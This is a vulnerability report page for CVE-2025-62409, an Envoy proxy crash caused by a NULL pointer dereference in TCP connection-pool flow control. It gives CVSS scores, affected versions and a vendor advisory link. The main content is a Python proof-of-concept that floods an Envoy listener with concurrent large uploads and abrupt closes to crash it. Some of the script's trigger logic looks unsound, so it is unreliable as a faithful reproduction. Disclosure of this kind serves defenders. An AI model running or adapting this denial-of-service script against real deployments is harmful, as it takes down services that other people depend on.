Security Vulnerability Report
CVE-2025-62409 CVSS 7.5 HIGH

Published: 2025-10-16 18:15:40
Last Modified: 2025-10-29 19:55:48

Description

Envoy is a cloud-native, open source edge and service proxy. Prior to 1.36.1, 1.35.5, 1.34.9, and 1.33.10, large requests and responses can trigger TCP connection pool crashes due to flow control management in Envoy. The crash occurs when the connection is closing while upstream data is still arriving, resulting in a buffer watermark callback nullptr dereference. The vulnerability impacts TCP proxy and HTTP 1 & 2 mixed use cases based on ALPN. This vulnerability is fixed in 1.36.1, 1.35.5, 1.34.9, and 1.33.10.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CVSS 4.0 (secondary): 6.6 MEDIUM, CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Weakness: CWE-476 (NULL Pointer Dereference)

Configurations (Affected Products)

cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:* - VULNERABLE (Envoy < 1.33.10)
cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:* - VULNERABLE (Envoy 1.34.0 - 1.34.8, upgrade to 1.34.9)
cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:* - VULNERABLE (Envoy 1.35.0 - 1.35.4, upgrade to 1.35.5)
cpe:2.3:a:envoyproxy:envoy:1.36.0:*:*:*:*:*:*:* - VULNERABLE (Envoy 1.36.0, upgrade to 1.36.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-62409 PoC - Envoy TCP Connection Pool Crash via Null Pointer Dereference
# This PoC demonstrates triggering the buffer watermark callback nullptr reference
# by sending large requests/responses during connection closing with upstream data still flowing.

import socket
import ssl
import threading
import time

TARGET_HOST = "127.0.0.1"
TARGET_PORT = 10000  # Envoy listener port
BUFFER_SIZE = 65536
LARGE_PAYLOAD_SIZE = 10 * 1024 * 1024  # 10MB to trigger flow control issues


def send_large_data_then_close():
    """
    Establishes a connection to Envoy, sends a large payload, then abruptly closes
    while data is still being processed upstream. This triggers the buffer
    watermark callback nullptr dereference.
    """
    try:
        # Create raw TCP connection (HTTP/1.x over ALPN-negotiated connection)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((TARGET_HOST, TARGET_PORT))

        # Send HTTP/1.1 request with large body to trigger flow control
        request = (
            f"POST /upload HTTP/1.1\r\n"
            f"Host: {TARGET_HOST}\r\n"
            f"Content-Length: {LARGE_PAYLOAD_SIZE}\r\n"
            f"Connection: close\r\n"
            f"\r\n"
        ).encode()
        sock.send(request)

        # Send large payload in chunks while connection is closing
        chunk = b"A" * BUFFER_SIZE
        sent = 0
        while sent < LARGE_PAYLOAD_SIZE:
            try:
                sock.send(chunk)
                sent += len(chunk)
            except (BrokenPipeError, ConnectionResetError):
                # Connection closing while data still flowing - triggers the bug
                break

        # Force close to create the race condition
        sock.close()
        print(f"[+] Sent {sent} bytes, connection closed abruptly")
    except Exception as e:
        print(f"[-] Connection error: {e}")


def trigger_http2_mixed():
    """
    Triggers the vulnerability via HTTP/1.x & HTTP/2 mixed ALPN scenario.
    """
    try:
        context = ssl.create_default_context()
        context.set_alpn_protocols(['h2', 'http/1.1'])
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock = context.wrap_socket(sock, server_hostname=TARGET_HOST)
        sock.settimeout(10)
        sock.connect((TARGET_HOST, TARGET_PORT))

        # Send large response-like data to trigger watermark issue
        large_data = b"X" * (5 * 1024 * 1024)
        sock.send(large_data)
        time.sleep(0.001)  # Race condition window
        sock.close()
        print("[+] ALPN mixed scenario triggered")
    except Exception as e:
        print(f"[-] ALPN scenario error: {e}")


if __name__ == "__main__":
    print("[*] CVE-2025-62409 PoC - Envoy TCP Connection Pool Crash")
    print(f"[*] Target: {TARGET_HOST}:{TARGET_PORT}")

    # Launch multiple concurrent connections to increase crash probability
    threads = []
    for i in range(10):
        t = threading.Thread(target=send_large_data_then_close)
        threads.append(t)
        t.start()
        time.sleep(0.1)

    # Also trigger HTTP/2 mixed scenario
    t = threading.Thread(target=trigger_http2_mixed)
    threads.append(t)
    t.start()

    for t in threads:
        t.join()

    print("[*] PoC execution complete. Check Envoy logs for crash.")
```

References

https://github.com/envoyproxy/envoy/security/advisories/GHSA-pq33-4jxh-hgm3 (Vendor Advisory)
